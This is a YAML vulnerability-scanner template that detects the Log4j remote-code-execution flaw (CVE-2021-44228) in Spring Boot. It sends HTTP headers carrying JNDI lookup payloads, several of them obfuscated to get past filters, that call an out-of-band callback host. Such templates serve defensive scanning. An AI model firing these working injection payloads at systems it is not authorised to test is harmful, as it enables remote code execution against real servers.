id: springboot-log4j-rce

info:
  name: Spring Boot - Remote Code Execution (Apache Log4j)
  author: pdteam
  severity: critical
  verified: true
  description: |
    Spring Boot is susceptible to remote code execution via Apache Log4j.
  reference:
    - https://logging.apache.org/log4j/2.x/security.html
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  solutions: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
  tags: cve,cve2021,springboot,rce,oast,log4j,kev
  created: 2023/07/02

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
rules:
  r0:
    request:
      method: GET
      path: /
      headers:
        X-Api-Version: ${jndi:ldap://{{reverseHost}}}
        Accept: text/html${jndi:ldap://{{reverseHost}}}
    expression: reverse.wait(5)
  r1:
    request:
      method: GET
      path: /
      headers:
        X-Api-Version: ${jndi:ldap:${::-/}${::-/}{{reverseHost}}}
        Accept: text/html${jndi:ldap:${::-/}${::-/}{{reverseHost}}}
    expression: reverse.wait(5)
  r2:
    request:
      method: GET
      path: /
      headers:
        X-Api-Version: ${${X::-j}ndi:rmi:${::-/}${X::-/}{{reverseHost}}}
        Accept: text/html${${X::-j}ndi:rmi:${::-/}${X::-/}{{reverseHost}}}
    expression: reverse.wait(5)
  r3:
    request:
      method: GET
      path: /
      headers:
        X-Api-Version: ${XXX:${${X::-jn}${X::-di}:${X::-l}d${X::-a}p:${X::-/}${X::-/}{{reverseHost}}}
        Accept: text/html${XXX:${${X::-jn}${X::-di}:${X::-l}d${X::-a}p:${X::-/}${X::-/}{{reverseHost}}}
    expression: reverse.wait(5)
  r4:
    request:
      method: GET
      path: /
      headers:
        X-Api-Version: ${jndi:ldap://{{reverseHost}}}
        Accept: text/html${jndi:ldap://{{reverseHost}}}
    expression: reverse.wait(5)
  r5:
    request:
      method: GET
      path: /
      headers:
        X-Api-Version: ${jndi:ldap:${::-/}${::-/}{{reverseHost}}}
        Accept: text/html${jndi:ldap:${::-/}${::-/}{{reverseHost}}}
    expression: reverse.wait(5)
  r6:
    request:
      method: GET
      path: /
      headers:
        X-Api-Version: ${${X::-j}ndi:rmi:${::-/}${X::-/}{{reverseHost}}}
        Accept: text/html${${X::-j}ndi:rmi:${::-/}${X::-/}{{reverseHost}}}
    expression: reverse.wait(5)
  r7:
    request:
      method: GET
      path: /
      headers:
        X-Api-Version: ${XXX:${${X::-jn}${X::-di}:${X::-l}d${X::-a}p:${X::-/}${X::-/}{{reverseHost}}}
        Accept: text/html${XXX:${${X::-jn}${X::-di}:${X::-l}d${X::-a}p:${X::-/}${X::-/}{{reverseHost}}}
    expression: reverse.wait(5)
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() 